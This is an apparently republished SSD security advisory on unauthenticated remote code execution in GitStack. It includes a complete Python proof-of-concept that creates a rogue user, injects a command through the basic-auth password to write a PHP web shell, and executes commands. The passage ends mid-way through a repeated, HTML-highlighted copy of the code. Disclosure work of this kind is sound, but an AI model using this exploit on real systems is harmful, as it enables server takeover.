{"id":11120,"date":"2018-01-15T14:19:13","date_gmt":"2018-01-15T22:19:13","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/01\/15\/news-4891\/"},"modified":"2018-01-15T14:19:13","modified_gmt":"2018-01-15T22:19:13","slug":"news-4891","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/01\/15\/news-4891\/","title":{"rendered":"SSD Advisory \u2013 GitStack Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 15 Jan 2018 12:22:25 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes an unauthenticated action that allows a remote attacker to add a user to GitStack, which can then be used to trigger unauthenticated remote code execution.<\/p>\n<p>GitStack is &#8220;a software that lets you setup your own private Git server for Windows. This means that you create a leading edge versioning system without any prior Git knowledge. GitStack also makes it super easy to secure and keep your server up to date. GitStack is built on the top of the genuine Git for Windows and is compatible with any other Git clients. 
GitStack is completely free for small teams.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We have tried to contact GitStack since October 17, 2017. Repeated attempts to establish contact were answered, but no details have been provided on a solution or a workaround.<br \/> <span id=\"more-3557\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> User-controlled input is not sufficiently filtered, allowing an unauthenticated attacker to add a user to the GitStack server by sending the following POST request:<\/p>\n<div id=\"crayon-5a5d28e06cc37142835078\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n
<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/rest\/user\/  data={'username' : username, 'password' : password}<\/textarea><\/div>\n<\/div>\n<p>Once the attacker has added a user to the server, they can enable the web repository feature.<\/p>\n<p>The attacker can then create a repository remotely and disable access to the new repository for everyone else.<\/p>\n<p>In that repository, the attacker can upload a backdoor and use it to execute code:<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2.jpg\" data-slb-active=\"1\" data-slb-asset=\"634677300\" data-slb-internal=\"0\" data-slb-group=\"3557\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-300x194.jpg\" alt=\"\" width=\"300\" height=\"194\" class=\"alignnone size-medium wp-image-3596\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-300x194.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-768x497.jpg 768w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2-1024x663.jpg 1024w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2018\/01\/GitStack1-2.jpg 1036w\" sizes=\"auto, (max-width: 300px) 100vw, 
300px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<div id=\"crayon-5a5d28e06cc41422615881\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 
15px !important;\"> import requests  from requests.auth import HTTPBasicAuth  import os  import sys    ip = &#8216;192.168.15.102&#8217;    # What command you want to execute  command = &#8220;whoami&#8221;    repository = &#8216;rce&#8217;  username = &#8216;rce&#8217;  password = &#8216;rce&#8217;  csrf_token = &#8216;token&#8217;    user_list = []    print &#8220;[+] Get user list&#8221;  r = requests.get(&#8220;http:\/\/{}\/rest\/user\/&#8221;.format(ip))  try:   user_list = r.json()   user_list.remove(&#8216;everyone&#8217;)  except:   pass    if len(user_list) &gt; 0:   username = user_list[0]   print &#8220;[+] Found user {}&#8221;.format(username)  else:   r = requests.post(&#8220;http:\/\/{}\/rest\/user\/&#8221;.format(ip), data={&#8216;username&#8217; : username, &#8216;password&#8217; : password})   print &#8220;[+] Create user&#8221;   if not &#8220;User created&#8221; in r.text and not &#8220;User already exist&#8221; in r.text:    print &#8220;[-] Cannot create user&#8221;    os._exit(0)    r = requests.get(&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;.format(ip))  if &#8220;true&#8221; in r.text:   print &#8220;[+] Web repository already enabled&#8221;  else:   print &#8220;[+] Enable web repository&#8221;   r = requests.put(&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;.format(ip), data='{&#8220;enabled&#8221; : &#8220;true&#8221;}&#8217;)   print &#8220;r: %s&#8221; % r   if not &#8220;Web interface successfully enabled&#8221; in r.text:    print &#8220;[-] Cannot enable web interface&#8221;    os._exit(0)    print &#8220;[+] Get repositories list&#8221;  r = requests.get(&#8220;http:\/\/{}\/rest\/repository\/&#8221;.format(ip))  repository_list = r.json()    if len(repository_list) &gt; 0:   repository = repository_list[0][&#8216;name&#8217;]   print &#8220;[+] Found repository {}&#8221;.format(repository)  else:   print &#8220;[+] Create repository&#8221;      r = 
requests.post(&#8220;http:\/\/{}\/rest\/repository\/&#8221;.format(ip), cookies={&#8216;csrftoken&#8217; : csrf_token}, data={&#8216;name&#8217; : repository, &#8216;csrfmiddlewaretoken&#8217; : csrf_token})  if not &#8220;The repository has been successfully created&#8221; in r.text and not &#8220;Repository already exist&#8221; in r.text:   print &#8220;[-] Cannot create repository&#8221;   os._exit(0)    print &#8220;[+] Add user to repository&#8221;  r = requests.post(&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;.format(ip, repository, username))    if not &#8220;added to&#8221; in r.text and not &#8220;has already&#8221; in r.text:   print &#8220;[-] Cannot add user to repository&#8221;   os._exit(0)    print &#8220;[+] Disable access for anyone&#8221;  r = requests.delete(&#8220;http:\/\/{}\/rest\/repository\/{}\/user\/{}\/&#8221;.format(ip, repository, &#8220;everyone&#8221;))    if not &#8220;everyone removed from rce&#8221; in r.text and not &#8220;not in list&#8221; in r.text:   print &#8220;[-] Cannot remove access for anyone&#8221;   os._exit(0)    print &#8220;[+] Create backdoor in PHP&#8221;  r = requests.get(&#8216;http:\/\/{}\/web\/index.php?p={}.git&amp;a=summary&#8217;.format(ip, repository), auth=HTTPBasicAuth(username, &#8216;p &amp;&amp; echo &#8220;&lt;?php system($_POST[&#8216;a&#8217;]); ?&gt;&#8221; &gt; c:GitStackgitphpexploit.php&#8217;))  print r.text.encode(sys.stdout.encoding, errors=&#8217;replace&#8217;)    print &#8220;[+] Execute command&#8221;  r = requests.post(&#8220;http:\/\/{}\/web\/exploit.php&#8221;.format(ip), data={&#8216;a&#8217; : command})  print r.text.encode(sys.stdout.encoding, errors=&#8217;replace&#8217;)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" 
data-line=\"crayon-5a5d28e06cc41422615881-1\"><\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; 
-webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-2\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">auth <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">HTTPBasicAuth<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-6\"><span class=\"crayon-v\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;192.168.15.102&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-8\"><span class=\"crayon-p\"># What command you want to execute<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-9\"><span class=\"crayon-v\">command<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;whoami&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-11\"><span class=\"crayon-v\">repository<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rce&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-12\"><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rce&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-13\"><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;rce&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-14\"><span class=\"crayon-v\">csrf_token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;token&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-16\"><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-18\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Get user list&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-19\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/user\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-20\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-21\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-22\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">remove<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;everyone&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-23\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-24\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-26\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">user_list<\/span><span 
class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-27\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">user_list<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-28\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Found user {}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-29\"><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-30\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/user\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span 
class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;username&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;password&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-31\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Create user&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-32\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User created&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">text <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;User already exist&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-33\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span 
class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot create user&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-34\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-36\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-37\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-38\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Web repository already enabled&#8221;<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-5a5d28e06cc41422615881-39\"><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-40\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Enable web repository&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-41\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">put<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/settings\/general\/webinterface\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;{&#8220;enabled&#8221; : &#8220;true&#8221;}&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-42\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;r: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-43\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;Web 
interface successfully enabled&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-44\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[-] Cannot enable web interface&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-45\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">_exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-47\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Get repositories list&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-48\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-49\"><span 
class=\"crayon-v\">repository_list<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">json<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-51\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">repository_list<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-52\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository_list<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;name&#8217;<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-53\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Found repository {}&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-54\"><span 
class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-55\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;[+] Create repository&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-56\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a5d28e06cc41422615881-57\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a5d28e06cc41422615881-58\"><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">post<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;http:\/\/{}\/rest\/repository\/&#8221;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">format<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cookies<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;csrftoken&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">csrf_token<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;name&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">repository<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span 
